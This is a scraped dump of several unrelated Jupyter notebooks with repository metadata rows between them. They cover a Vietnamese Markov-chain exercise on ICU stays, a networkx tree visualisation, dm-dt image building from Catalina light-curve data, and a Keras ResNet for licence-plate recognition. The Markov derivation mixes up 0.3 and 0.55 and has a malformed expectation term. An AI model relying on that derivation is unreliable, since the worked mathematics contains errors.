-------------- | ---------- | ------------ | -------- | --------- |\n| 0.6 | 0.3 | 0.1 | 0 | 0 |", "_____no_output_____" ], [ "*a.* Xác suất để một ", "_____no_output_____" ] ], [ [ "G3 = pvz.MarkovChain()\nG3.from_file('./ass4.2/input_3.csv')", "_____no_output_____" ], [ "G3.get_mean_time(source='CS_TANGCUONG', target='CS_TANGCUONG', type='transient')", "_____no_output_____" ] ], [ [ "*b.* Xác suất một bệnh nhân ở phòng ICU liên tiếp $k$ ngày là $0.55^k$\n\nDo đó số ngày trung bình để bệnh nhân đó tiếp tục phải ở lại chăm sóc tại phòng ICU là\n$$\nE(X|) = \\underset{n \\to \\infty}{lim}\\sum_{k = 1}^{n}k*0.55^k\n$$\n\nXét \n$$\n\\begin{aligned}f(x) & = \\sum_{i = 1}^{n}x^i \\\\\\Rightarrow f'(x) & = \\sum_{i = 1}^{n-1}ix^{i-1} \\\\\\Rightarrow xf'(x) & = \\sum_{i = 1}^{n-1}ix^{i}\\end{aligned}\n$$\nMặt khác lại có \n$$\n\\begin{aligned}f(x) & = \\frac{1-x^{n+1}}{1-x} \\\\\\Rightarrow f'(x) & = \\frac{1-x^{n+1}}{(1-x)^2} - \\frac{x^{n+1}(n+1)}{x(1-x)} \\\\\\Rightarrow xf'(x) & = x\\frac{1-x^{n+1}}{(1-x)^2} - \\frac{x^{n+2}(n+1)}{x(1-x)}\\end{aligned}\n$$\nDo đó\n$$\n\\begin{aligned}E(X) & = \\underset{n \\to \\infty}{lim}\\left(0.3\\frac{1-0.3^{n+1}}{(1-0.3)^2} - \\frac{0.3^{n+2}(n+1)}{0.3(1-0.3)}\\right) \\\\& = \\frac{0.55}{1-(0.55)^2} = 2.72\\end{aligned}\n$$\n", "_____no_output_____" ] ], [ [ "G4 = pvz.MarkovChain()", "_____no_output_____" ], [ "G4.from_file('./ass4.2/input_4.csv')", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ] ]
e72ff6c0c79f6dc5f8b14b01655b4a7b19da2f75
44,864
ipynb
Jupyter Notebook
tree_visualization.ipynb
luishengjie/parallel-bfs
c27b75b7d43e526876ed0716ad8faad621357e10
[ "MIT" ]
null
null
null
tree_visualization.ipynb
luishengjie/parallel-bfs
c27b75b7d43e526876ed0716ad8faad621357e10
[ "MIT" ]
null
null
null
tree_visualization.ipynb
luishengjie/parallel-bfs
c27b75b7d43e526876ed0716ad8faad621357e10
[ "MIT" ]
null
null
null
280.4
21,400
0.924394
[ [ [ "import numpy as np\nfrom src.load_graph import get_graph, gen_balanced_tree\nimport networkx as nx\nimport matplotlib.pyplot as plt", "_____no_output_____" ], [ "A = get_graph(directed=False)\nprint(A)", "[[0 1 1 0 0 0 0 0 0 0 0 0 0 0 0]\n [1 0 0 1 1 0 0 0 0 0 0 0 0 0 0]\n [1 0 0 0 0 1 1 0 0 0 0 0 0 0 0]\n [0 1 0 0 0 0 0 1 1 0 0 0 0 0 0]\n [0 1 0 0 0 0 0 0 0 1 1 0 0 0 0]\n [0 0 1 0 0 0 0 0 0 0 0 1 1 0 0]\n [0 0 1 0 0 0 0 0 0 0 0 0 0 1 1]\n [0 0 0 1 0 0 0 0 0 0 0 0 0 0 0]\n [0 0 0 1 0 0 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 1 0 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 1 0 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 1 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 1 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 0 1 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 0 1 0 0 0 0 0 0 0 0]]\n" ], [ "def show_graph_with_labels(adjacency_matrix):\n rows, cols = np.where(adjacency_matrix == 1)\n edges = zip(rows.tolist(), cols.tolist())\n gr = nx.Graph()\n gr.add_edges_from(edges)\n pos = nx.spring_layout(gr)\n\n nx.draw(gr, pos, node_size=300, with_labels=True)\n plt.show()\n", "_____no_output_____" ], [ "show_graph_with_labels(A)", "_____no_output_____" ], [ "A1 = gen_balanced_tree(height=3, branch=2)\nprint(A1)\nshow_graph_with_labels(A1)", "[[0 1 1 0 0 0 0 0 0 0 0 0 0 0 0]\n [1 0 0 1 1 0 0 0 0 0 0 0 0 0 0]\n [1 0 0 0 0 1 1 0 0 0 0 0 0 0 0]\n [0 1 0 0 0 0 0 1 1 0 0 0 0 0 0]\n [0 1 0 0 0 0 0 0 0 1 1 0 0 0 0]\n [0 0 1 0 0 0 0 0 0 0 0 1 1 0 0]\n [0 0 1 0 0 0 0 0 0 0 0 0 0 1 1]\n [0 0 0 1 0 0 0 0 0 0 0 0 0 0 0]\n [0 0 0 1 0 0 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 1 0 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 1 0 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 1 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 1 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 0 1 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 0 1 0 0 0 0 0 0 0 0]]\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code" ] ]
e72ff76df584025a3ca8cd65006c284267567c7e
16,045
ipynb
Jupyter Notebook
all_codes/dmdt_matrix_and_images_formation/merge_data_original_file_and_one_prog_for_all-ogal_data-Copy21.ipynb
shreya996/true_dat
7b31ffefb51c4db173a8fe7c29fb13f1f89579e4
[ "MIT" ]
null
null
null
all_codes/dmdt_matrix_and_images_formation/merge_data_original_file_and_one_prog_for_all-ogal_data-Copy21.ipynb
shreya996/true_dat
7b31ffefb51c4db173a8fe7c29fb13f1f89579e4
[ "MIT" ]
null
null
null
all_codes/dmdt_matrix_and_images_formation/merge_data_original_file_and_one_prog_for_all-ogal_data-Copy21.ipynb
shreya996/true_dat
7b31ffefb51c4db173a8fe7c29fb13f1f89579e4
[ "MIT" ]
null
null
null
36.218962
1,436
0.595201
[ [ [ "import pandas as pd\ndata=pd.read_csv('C:\\\\Users\\\\Shreya choudhary\\\\ecsvfile.txt', sep=\" \",names=[\"Catalina_Surveys_ID\",\"ID\",\"RA_(J2000)\",\" Dec \",\"V_(mag)\",\"Period_(days)\",\"Amplitude\",\"Number_Obs\",\"Var_Type\"])\ndata1=pd.read_csv('C:\\\\Users\\\\Shreya choudhary\\\\Downloads\\\\ttt\\\\ALLVar', sep=\",\",header=None ,names=[\"ID\",\"MJD\",\"Mag\",\"Magerr\",\"RA\",\"Dec\"])\nresult = data[['ID','Var_Type']].merge(data1[['ID','MJD','Mag']], on = 'ID',how = 'left')\nresult1=result.round({'Mag': 6})\nresult1.to_csv('merged.txt', encoding='utf-8',index=False)\n", "_____no_output_____" ], [ "import os\nimport time\nfrom sklearn.utils import shuffle\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn.metrics import confusion_matrix\nimport itertools\n\nfrom lasagne import random as lasagne_random\nfrom lasagne import layers\nfrom lasagne.nonlinearities import softmax, tanh\nfrom lasagne import objectives\nfrom lasagne import updates\n\nimport theano\nimport theano.tensor as T\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")", "_____no_output_____" ], [ "(result1.loc[result1['Var_Type'] == 13]).to_csv('vartype_13_data.txt',encoding='utf-8',index=False)\n", "_____no_output_____" ], [ "import pandas as pd\ndata2=pd.read_csv('C:\\\\Users\\\\Shreya choudhary\\\\vartype_13_data.txt')\ndata3 = data2.groupby('ID')\ndata3.apply(lambda x: x.to_csv('ID' + str(x.name) + '.txt',index=False,header=None))", "_____no_output_____" ], [ "import pandas as pd\nimport glob\nimport numpy as np\n\n#l = [pd.read_csv(filename) for filename in glob.glob(\"C:\\\\Users\\\\Shreya choudhary\\\\variable type\\\\*.txt\")]\n\n\n#file_list = glob.glob(\"/home/dic/jupyter/var4_txtfiles\" + \"/*.txt\") #Get folder path containing text files\n\n#print(file_list)\nd=1\n#for file_path in file_list:\n #print(file_path)\nID,Var_Type,MJD,Mag=np.loadtxt(\"/home/dic/jupyter/var4_txtfiles/ID1001006032764.txt\", unpack=True, 
delimiter=',')\nc=[]\ne=[]\nfor i in range(0,len(Mag)):\n for j in range(i+1,len(Mag)):\n c.append(Mag[i]-Mag[j])\n #print(c) \nfor i in range(0,len(MJD)):\n for j in range(i+1,len(MJD)):\n e.append(MJD[j]-MJD[i])\n #print(e)\ns1 = pd.Series(c, name='dm_y')\n\ns2 = pd.Series(e,name='dt_x')\n\n\n\n#Assigning bins to all dmdt values\n\nbins=[-8,-5,-3,-2.5,-2,-1.5,-1,-0.5,-0.3,-0.2,-0.1,0,0.1,0.2,0.3,0.5,1,1.5,2,2.5,3,5,8]\n#bins1=[0,10,20,30,40,50,60,70,80,90,100,110,120,130,140,150,160,170,180,190,200,210,220,230,240,250,260,270,280,290,300,310,320,330,340,350,360,370,380,390,400,410,420,430,440,450,460,470,480,490,500,510,520,530,540,550,560,570,580,590,600,610,620,630,640,650,660,670,680,690,700,710,720,730,740,750,760,770,780,790,800,810,820,830,840,850,860,870,880,890,900,910,920,930,940,950,960,970,980,990,1000,1010,1020,1030,1040,1050,1060,1070,1080,1090,1100,1110,1120,1130,1140,1150,1160,1170,1180,1190,1200,1210,1220,1230,1240,1250,1260,1270,1280,1290,1300,1310,1320,1330,1340,1350,1360,1370,1380,1390,1400,1410,1420,1430,1440,1450,1460,1470,1480,1490,1500,1510,1520,1530,1540,1550,1560,1570,1580,1590,1600,1610,1620,1630,1640,1650,1660,1670,1680,1690,1700,1710,1720,1730,1740,1750,1760,1770,1780,1790,1800,1810,1820,1830,1840,1850,1860,1870,1880,1890,1900,1910,1920,1930,1940,1950,1960,1970,1980,1990,2000,2010,2020,2030,2040,2050,2060,2070,2080,2090,2100,2110,2120,2130,2140,2150,2160,2170,2180,2190,2200,2210,2220,2230,2240,2250,2260,2270,2280,2290,2300,2310,2320,2330,2340,2350,2360,2370,2380,2390,2400,2410,2420,2430,2440,2450,2460,2470,2480,2490,2500,2510,2520,2530,2540,2550,2560,2570,2580,2590,2600,2610,2620,2630,2640,2650,2660,2670,2680,2690,2700,2710,2720,2730,2740,2750,2760,2770,2780,2790,2800,2810,2820,2830,2840,2850,2860,2870] #bins of x axis\nbins1=[1/145,2/145,3/145,4/145,1/25,2/25,3/25,1.5,2.5,3.5,4.5,5.5,7,10,20,30,60,90,120,240,600,960,2000,4000]\nreturn_bins_of_s2= np.digitize(s2, bins1) # np.digitize gives the bin number to which a particular value of 
dm, dt belongs to.\nreturn_bins_of_s1 = np.digitize(s1, bins)\nybins = pd.Series(return_bins_of_s1, name='ybin')\nxbins = pd.Series(return_bins_of_s2, name='xbin')\n\ndmdt=pd.concat([s1, s2,ybins,xbins], axis=1)\n#print(dmdt)\n\n\n# exclude all the values from dataframe dmdt that are outside the bin boundries i.e. bin number 0, 23 and 24\n#dmdt=dmdt[dmdt.ybin != 23]\n#dmdt=dmdt[dmdt.xbin != 0]\n#dmdt=dmdt[dmdt.ybin != 0]\n#dmdt=dmdt[dmdt.xbin != 5]\n\n\ndmdt['bins_xaxis']=pd.cut(dmdt['dt_x'],bins1) #pd.cut gives range of bin for all dt_x values \ndmdt['bins_yaxis']=pd.cut(dmdt['dm_y'],bins)\n\n\ndmdt['merged_dmdt']= dmdt.dm_y.map(str) + ',' + dmdt.dt_x.map(str)\ndmdt['dmdt_bin_number']= dmdt.ybin.map(str) + ',' + dmdt.xbin.map(str)\n\ndmdt.dropna() # drops all the values with NaN in dataframe dmdt\n #print(dmdt)\n \n\ndmdtpairs=len(dmdt.dm_y) # number of dmdtpairs for a light curve of length n that falls under the given bin range\n #print(dmdtpairs)\n\n\n#grouping and counting all the values that fall in all individual bins\ndf=dmdt.groupby('dmdt_bin_number',sort=False).merged_dmdt.agg(['count']) #counts how many merged_dmdt benlongs to each 'dmdt_bin_number' range\n#print(df)\n#df.hist(bin=4)\ndf.to_csv('/home/dic/jupyter/count155.txt',encoding='utf-8')\n\ndata_count=pd.read_csv('/home/dic/jupyter/count155.txt')\n\nldf=dmdt.set_index('dmdt_bin_number').join(data_count.set_index('dmdt_bin_number'))\n\nabcc=ldf.dropna()\nfinal=abcc.drop_duplicates(['ybin','xbin']) # drops all the rows where both of values of ybin and xbin are duplicate\nfinal1=final.drop(['bins_xaxis','bins_yaxis','merged_dmdt'],axis=1)\n #print(final1)\nfinal1.to_csv('/home/dic/jupyter/final_table1155.txt',encoding='utf-8',header=None,index=False)\n\n \ndm,dt,xbin,ybin,count=np.loadtxt('/home/dic/jupyter/final_table1155.txt',unpack=True,delimiter=',',dtype=\"i\")\n\n# assignig intensity values to each bin. 
Bins are in the form of 23x24 numpy array\n\naa = np.zeros(shape=(23,24))\nfor gg in range(0,len(xbin)):\n \n l1=xbin[gg]\n m1=ybin[gg]\n o1=count[gg]\n i1=(255 * o1)/(dmdtpairs + 0.99999)\n print(i1)\n aa[l1-1,m1-1]=i1\n \n #print (aa) \n \nimport seaborn as sns\nsns.set()\nimport cv2\nimport matplotlib.pyplot as plt\n#sns.distplot(aa, kde=False, rug=True)\nimage11=sns.heatmap(aa,cmap='jet',vmin=0, vmax=255,cbar=False,square=True,xticklabels=False, yticklabels=False)\n#,square=False,xticklabels=True, yticklabels=True\n#image11=sns.heatmap(aa,xticklabels=False, yticklabels=False)\n#vmin=0, vmax=255,\n#cmap='RdYlBu'// colormap of heatmap\n#sns_plot.figure.savefig(\"output.png\")\n #, bbox_inches = 'tight',pad_inches = 0\nimage11.figure.savefig(\"/home/dic/jupyter/image_var4_dt_elongated\"+\"/gg%d.png\" %d, bbox_inches = 'tight',pad_inches = 0)\n #d+=1\n#plt.hist(image11, bins=256, range=(0.0, 1.0)) \nimg = cv2.imread(\"/home/dic/jupyter/image_var4_dt_elongated/gg.png\",0)\n#plt.hist(img.ravel(),256,[0,256])\n#plt.show()\n#cv2.calcHist([img],[0],None,[256],[0,256])\n\n#plt.show()\n", 
"0.0454396958942\n0.0151465652981\n0.0378664132452\n0.302931305961\n0.23477176212\n0.507409937485\n0.727035134308\n0.348371001856\n0.39381069775\n0.0378664132452\n6.39185055579\n5.50577648585\n7.1188856901\n1.27988476769\n0.0302931305961\n0.00757328264904\n0.492263372187\n0.0454396958942\n0.128745805034\n0.0681595438413\n0.371090849803\n0.302931305961\n0.681595438413\n0.408957263048\n0.636155742519\n0.340797719207\n0.310504588611\n8.11098571712\n7.53541623579\n10.2617979894\n2.75667488425\n0.0757328264904\n0.00757328264904\n0.461970241591\n0.0378664132452\n0.0984526744375\n0.181758783577\n0.749754982255\n0.408957263048\n0.363517567154\n0.507409937485\n0.70431528636\n0.265064892716\n0.227198479471\n8.14127884772\n7.49754982255\n14.1165988578\n4.30162454465\n0.0757328264904\n0.00757328264904\n0.0833061091394\n0.0227198479471\n0.0605862611923\n0.0681595438413\n0.23477176212\n0.242345044769\n0.0530129785433\n0.454396958942\n0.484690089538\n0.424103828346\n0.0605862611923\n6.27825131605\n6.53574292612\n14.457396577\n5.22556502784\n0.0378664132452\n0.00757328264904\n0.0378664132452\n0.0378664132452\n0.0605862611923\n0.0908793917884\n0.0605862611923\n0.257491610067\n0.15903893563\n0.151465652981\n0.00757328264904\n4.51367645883\n5.9298803142\n13.3744171582\n4.86204746068\n0.00757328264904\n0.0302931305961\n0.113599239736\n0.0757328264904\n0.212051914173\n0.106025957087\n0.0530129785433\n0.302931305961\n0.0151465652981\n6.67963529645\n6.11163909777\n15.6766950835\n7.73989486732\n0.0151465652981\n0.113599239736\n0.0454396958942\n0.340797719207\n2.21139853352\n2.23411838147\n6.52059636082\n4.12743904373\n0.0454396958942\n0.0454396958942\n0.121172522385\n0.0302931305961\n0.0227198479471\n0.00757328264904\n0.00757328264904\n0.0227198479471\n0.121172522385\n0.143892370332\n0.143892370332\n0.128745805034\n0.477116806889\n0.0378664132452\n0.0681595438413\n0.265064892716\n1.66612218279\n1.12841911471\n1.61310920424\n0.272638175365\n0.0227198479471\n0.0530129785433\n0.15903893563\n0
.204478631524\n0.143892370332\n0.46954352424\n0.333224436558\n0.408957263048\n0.530129785433\n2.90056725458\n2.46131686094\n4.87719402598\n0.598289329274\n0.00757328264904\n0.0151465652981\n0.0151465652981\n0.0605862611923\n0.0984526744375\n0.0908793917884\n0.363517567154\n0.727035134308\n0.249918327418\n0.0757328264904\n3.76392147657\n2.68851534041\n4.77116806889\n0.401383980399\n" ], [ "a=[]\n\nfor i in range(0,2880,10):\n print(i,end=',')\n ", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code" ] ]
e72ffd4bbbd2f5fc6f3328a76372036c95c71d4a
345,530
ipynb
Jupyter Notebook
car-management/recognitionalgorithm/.ipynb_checkpoints/resnet_1_0-checkpoint.ipynb
treeandgrass/Miscellaneous
377660870dc9559b1aa7bba1d78c67ad256ed4a7
[ "MIT" ]
null
null
null
car-management/recognitionalgorithm/.ipynb_checkpoints/resnet_1_0-checkpoint.ipynb
treeandgrass/Miscellaneous
377660870dc9559b1aa7bba1d78c67ad256ed4a7
[ "MIT" ]
null
null
null
car-management/recognitionalgorithm/.ipynb_checkpoints/resnet_1_0-checkpoint.ipynb
treeandgrass/Miscellaneous
377660870dc9559b1aa7bba1d78c67ad256ed4a7
[ "MIT" ]
null
null
null
249.840926
122,852
0.858773
[ [ [ "from keras.models import Model\nfrom keras.layers import Dense, Input, BatchNormalization, Activation, Conv2D, MaxPooling2D, AveragePooling2D, Dropout\nfrom keras.layers import Add, Reshape, Flatten\nfrom keras import backend as K\nfrom keras.utils import plot_model\nfrom keras.utils.vis_utils import model_to_dot\nfrom IPython.display import display\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom ImageUtils import ImageUtils\nimport pickle\nfrom keras import regularizers", "D:\\sf\\conda\\lib\\site-packages\\h5py\\__init__.py:36: FutureWarning: Conversion of the second argument of issubdtype from `float` to `np.floating` is deprecated. In future, it will be treated as `np.float64 == np.dtype(float).type`.\n from ._conv import register_converters as _register_converters\nUsing TensorFlow backend.\n" ], [ "#基本常量\nsourceFolder = 'D:/jupyter/car-management/recognitionalgorithm/dataset/rimages'\ntargetFolder = 'D:/jupyter/car-management/recognitionalgorithm/dataset/rimagesResize320'\nroot = 'D:/jupyter/car-management/recognitionalgorithm/dataset'\nXfilename = 'licenseplateL.npy'\nYfilename = 'label.npy'\nfilename = '字典.xlsx'", "_____no_output_____" ], [ "#加载图片数据\nutils = ImageUtils()", "_____no_output_____" ], [ "#检查图片数据\nX_train, Y_train = utils.load(root, Xfilename, Yfilename)\nprint(X_train.shape)\nprint(Y_train.shape)\nprint(utils.getLabel(root, filename, Y_train[10]))\nplt.imshow(X_train[10])", "(1222, 320, 320)\n(1222, 7)\n云D86999\n" ], [ "def identify_block(X, filters, name, strides):\n conv_name = 'identify_conv' + str(name)\n bn_name = 'identify_bn_name' + str(name)\n activation_name = 'identify_activation_name' + str(name)\n add_name = 'identify_add' + str(name)\n skip_name = 'identify_skip' + str(name)\n \n f_1_1, f_1_2, skip_1_1 = filters\n \n '''first unit'''\n conv_1_1 = Conv2D(f_1_1, (3, 3), strides = strides, padding = 'same', name = conv_name + '_1_1', kernel_initializer = 'truncated_normal', kernel_regularizer = 
regularizers.l2(0.001))(X)\n bn_1_1 = BatchNormalization(name = bn_name + '_1_1')(conv_1_1)\n activation_1_1 = Activation('relu', name = activation_name + '_1_1')(bn_1_1)\n \n '''second unit'''\n conv_2_1 = Conv2D(f_1_2, (3, 3), strides = strides, padding = 'same', name = conv_name + '_2_1', kernel_initializer = 'truncated_normal', kernel_regularizer = regularizers.l2(0.001))(activation_1_1)\n bn_2_1 = BatchNormalization(name = bn_name + '_2_1')(conv_2_1)\n activation_2_1 = Activation('relu', name = activation_name + '_2_1')(bn_2_1)\n \n '''skip unit'''\n skip_strides = 2 * strides\n if strides == 1:\n skip_strides = 1\n \n conv_skip_1_1 = Conv2D(skip_1_1, (3, 3), strides = skip_strides, padding = 'same', name = skip_name + '_1_1', kernel_initializer = 'truncated_normal', kernel_regularizer = regularizers.l2(0.001))(X)\n \n identify = Add(name = add_name + '_1_1')([activation_2_1, conv_skip_1_1])\n \n return identify", "_____no_output_____" ], [ "'''build convlution block'''\ndef bottleneck_block(X, filters, name, strides):\n conv_name = 'bk_conv' + str(name)\n bn_name = 'bk_bn' + str(name)\n activation_name = 'bk_an' + str(name)\n add_name = 'bk_add' + str(name)\n skip_name = 'bk_sk' + str(name)\n \n f_1_1, f_1_2, f_1_3, skip_1_1 = filters\n \n '''first unit'''\n conv_1_1 = Conv2D(f_1_1, (1, 1), strides = strides, padding = 'same', name = conv_name + '1_1', kernel_initializer = 'truncated_normal', kernel_regularizer = regularizers.l2(0.001))(X)\n bn_1_1 = BatchNormalization(name = bn_name + '1_1')(conv_1_1)\n activation_1_1 = Activation('relu', name = activation_name + '1_1')(bn_1_1)\n \n '''second unit'''\n conv_2_1 = Conv2D(f_1_2, (3, 3), strides = strides, padding = 'same', name = conv_name + '2_1', kernel_initializer = 'truncated_normal', kernel_regularizer = regularizers.l2(0.001))(activation_1_1)\n bn_2_1 = BatchNormalization(name = bn_name + '2_1')(conv_2_1)\n activation_2_1 = Activation('relu', name = activation_name + '2_1')(bn_2_1)\n \n '''skip unit'''\n 
conv_3_1 = Conv2D(f_1_3, (1, 1), strides = strides, padding = 'same', name = conv_name + '3_1', kernel_initializer = 'truncated_normal', kernel_regularizer = regularizers.l2(0.001))(activation_2_1)\n bn_3_1 = BatchNormalization(name = bn_name + '3_1')(conv_3_1)\n activation_3_1 = Activation('relu', name = activation_name + '3_1')(bn_3_1)\n \n '''skip unit'''\n skip_strides = int(pow(strides, 3))\n if strides == 1:\n skip_strides = 1\n conv_skip_1_1 = Conv2D(skip_1_1, (3, 3), strides = skip_strides, name = skip_name + 'c_1_1', padding = 'same', kernel_initializer = 'truncated_normal', kernel_regularizer = regularizers.l2(0.001))(X)\n bn_skip_1_1 = BatchNormalization(name = skip_name + '_1_1')(conv_skip_1_1)\n activation_skip_1_1 = Activation('relu', name = skip_name + 'an_1_1')(bn_skip_1_1)\n \n \n bottleneck = Add(name = add_name + '_1_1')([activation_3_1, activation_skip_1_1])\n \n return bottleneck", "_____no_output_____" ], [ "'''build full network'''\ndef resnet(input_shape, full_conncet_nums = (512, 7)):\n '''inputs'''\n inputs = Input(shape = input_shape)\n \n \n '''128 filters, identify name: 1 256 filters, bottleneck name: 1'''\n bottleneck_block_1 = bottleneck_block(inputs, filters = (128, 128, 128, 128), name = 1, strides = 2)\n identify_block_1 = identify_block(bottleneck_block_1, filters = (256, 256, 256), name = 1, strides = 1)\n \n \n '''max pooling'''\n mp2d = MaxPooling2D(pool_size = (2, 2))(identify_block_1)\n \n '''relu activation'''\n an_block_1 = Activation('relu', name = 'model_an_1')(mp2d)\n \n '''dropout'''\n d_bottleneck_block_1 = Dropout(0.25)(an_block_1)\n \n '''256 filters, identify name: 2 512 filters, bottleneck name: 2'''\n bottleneck_block_2 = bottleneck_block(d_bottleneck_block_1, filters = (512, 512, 512, 512), name = 2, strides = 1)\n identify_block_2 = identify_block(bottleneck_block_2, filters = (1024, 1024, 1024), name = 2, strides = 1)\n \n '''relu activation'''\n an_block_2 = Activation('relu', name = 
'model_an_2')(identify_block_2)\n \n '''dropout'''\n d_bottleneck_block_2 = Dropout(0.25)(an_block_2)\n \n '''1024 filters, identify name: 2 2048 filters, bottleneck name: 2'''\n# bottleneck_block_3 = bottleneck_block(d_bottleneck_block_2, filters = (1024, 1024, 1024, 1024), name = 3, strides = 2)\n# identify_block_3 = identify_block(d_bottleneck_block_2, filters = (2048, 2048, 2048), name = 3, strides = 2)\n \n '''average pooling'''\n ap2d = AveragePooling2D(pool_size = (1, 1))(d_bottleneck_block_2)\n \n '''dropout 0.05'''\n d_bottleneck_block_3 = Dropout(0.5)(ap2d)\n \n \n '''flatten'''\n flatten = Flatten()(d_bottleneck_block_3)\n \n '''full connect params'''\n full_connect_num_1, full_connect_num_2 = full_conncet_nums\n \n '''full connect layer 1'''\n full_connect1 = Dense(full_connect_num_1, activation = 'relu', kernel_initializer = 'glorot_normal', kernel_regularizer = regularizers.l2(0.1))(flatten)\n \n \n '''full conncet layer 2'''\n end_full_connect = Dense(full_connect_num_2, activation = 'softmax', kernel_initializer = 'glorot_normal', kernel_regularizer = regularizers.l2(0.1))(full_connect1)\n\n '''build model'''\n model = Model(inputs = inputs, outputs = end_full_connect)\n \n return model", "_____no_output_____" ], [ "'''build model obejct'''\nmodel = resnet(input_shape = (320, 320, 3))\nmodel.summary()", "__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_2 (InputLayer) (None, 320, 320, 3) 0 \n__________________________________________________________________________________________________\nbk_conv11_1 (Conv2D) (None, 160, 160, 128 512 input_2[0][0] \n__________________________________________________________________________________________________\nbk_bn11_1 (BatchNormalization) (None, 160, 160, 128 512 bk_conv11_1[0][0] 
\n__________________________________________________________________________________________________\nbk_an11_1 (Activation) (None, 160, 160, 128 0 bk_bn11_1[0][0] \n__________________________________________________________________________________________________\nbk_conv12_1 (Conv2D) (None, 80, 80, 128) 147584 bk_an11_1[0][0] \n__________________________________________________________________________________________________\nbk_bn12_1 (BatchNormalization) (None, 80, 80, 128) 512 bk_conv12_1[0][0] \n__________________________________________________________________________________________________\nbk_an12_1 (Activation) (None, 80, 80, 128) 0 bk_bn12_1[0][0] \n__________________________________________________________________________________________________\nbk_conv13_1 (Conv2D) (None, 40, 40, 128) 16512 bk_an12_1[0][0] \n__________________________________________________________________________________________________\nbk_sk1c_1_1 (Conv2D) (None, 40, 40, 128) 3584 input_2[0][0] \n__________________________________________________________________________________________________\nbk_bn13_1 (BatchNormalization) (None, 40, 40, 128) 512 bk_conv13_1[0][0] \n__________________________________________________________________________________________________\nbk_sk1_1_1 (BatchNormalization) (None, 40, 40, 128) 512 bk_sk1c_1_1[0][0] \n__________________________________________________________________________________________________\nbk_an13_1 (Activation) (None, 40, 40, 128) 0 bk_bn13_1[0][0] \n__________________________________________________________________________________________________\nbk_sk1an_1_1 (Activation) (None, 40, 40, 128) 0 bk_sk1_1_1[0][0] \n__________________________________________________________________________________________________\nbk_add1_1_1 (Add) (None, 40, 40, 128) 0 bk_an13_1[0][0] \n bk_sk1an_1_1[0][0] \n__________________________________________________________________________________________________\nidentify_conv1_1_1 (Conv2D) (None, 40, 
40, 256) 295168 bk_add1_1_1[0][0] \n__________________________________________________________________________________________________\nidentify_bn_name1_1_1 (BatchNor (None, 40, 40, 256) 1024 identify_conv1_1_1[0][0] \n__________________________________________________________________________________________________\nidentify_activation_name1_1_1 ( (None, 40, 40, 256) 0 identify_bn_name1_1_1[0][0] \n__________________________________________________________________________________________________\nidentify_conv1_2_1 (Conv2D) (None, 40, 40, 256) 590080 identify_activation_name1_1_1[0][\n__________________________________________________________________________________________________\nidentify_bn_name1_2_1 (BatchNor (None, 40, 40, 256) 1024 identify_conv1_2_1[0][0] \n__________________________________________________________________________________________________\nidentify_activation_name1_2_1 ( (None, 40, 40, 256) 0 identify_bn_name1_2_1[0][0] \n__________________________________________________________________________________________________\nidentify_skip1_1_1 (Conv2D) (None, 40, 40, 256) 295168 bk_add1_1_1[0][0] \n__________________________________________________________________________________________________\nidentify_add1_1_1 (Add) (None, 40, 40, 256) 0 identify_activation_name1_2_1[0][\n identify_skip1_1_1[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d_2 (MaxPooling2D) (None, 20, 20, 256) 0 identify_add1_1_1[0][0] \n__________________________________________________________________________________________________\nmodel_an_1 (Activation) (None, 20, 20, 256) 0 max_pooling2d_2[0][0] \n__________________________________________________________________________________________________\ndropout_4 (Dropout) (None, 20, 20, 256) 0 model_an_1[0][0] \n__________________________________________________________________________________________________\nbk_conv21_1 (Conv2D) (None, 20, 20, 512) 
131584 dropout_4[0][0] \n__________________________________________________________________________________________________\nbk_bn21_1 (BatchNormalization) (None, 20, 20, 512) 2048 bk_conv21_1[0][0] \n__________________________________________________________________________________________________\nbk_an21_1 (Activation) (None, 20, 20, 512) 0 bk_bn21_1[0][0] \n__________________________________________________________________________________________________\nbk_conv22_1 (Conv2D) (None, 20, 20, 512) 2359808 bk_an21_1[0][0] \n__________________________________________________________________________________________________\nbk_bn22_1 (BatchNormalization) (None, 20, 20, 512) 2048 bk_conv22_1[0][0] \n__________________________________________________________________________________________________\nbk_an22_1 (Activation) (None, 20, 20, 512) 0 bk_bn22_1[0][0] \n__________________________________________________________________________________________________\nbk_conv23_1 (Conv2D) (None, 20, 20, 512) 262656 bk_an22_1[0][0] \n__________________________________________________________________________________________________\nbk_sk2c_1_1 (Conv2D) (None, 20, 20, 512) 1180160 dropout_4[0][0] \n__________________________________________________________________________________________________\nbk_bn23_1 (BatchNormalization) (None, 20, 20, 512) 2048 bk_conv23_1[0][0] \n__________________________________________________________________________________________________\nbk_sk2_1_1 (BatchNormalization) (None, 20, 20, 512) 2048 bk_sk2c_1_1[0][0] \n__________________________________________________________________________________________________\nbk_an23_1 (Activation) (None, 20, 20, 512) 0 bk_bn23_1[0][0] \n__________________________________________________________________________________________________\nbk_sk2an_1_1 (Activation) (None, 20, 20, 512) 0 bk_sk2_1_1[0][0] \n__________________________________________________________________________________________________\nbk_add2_1_1 
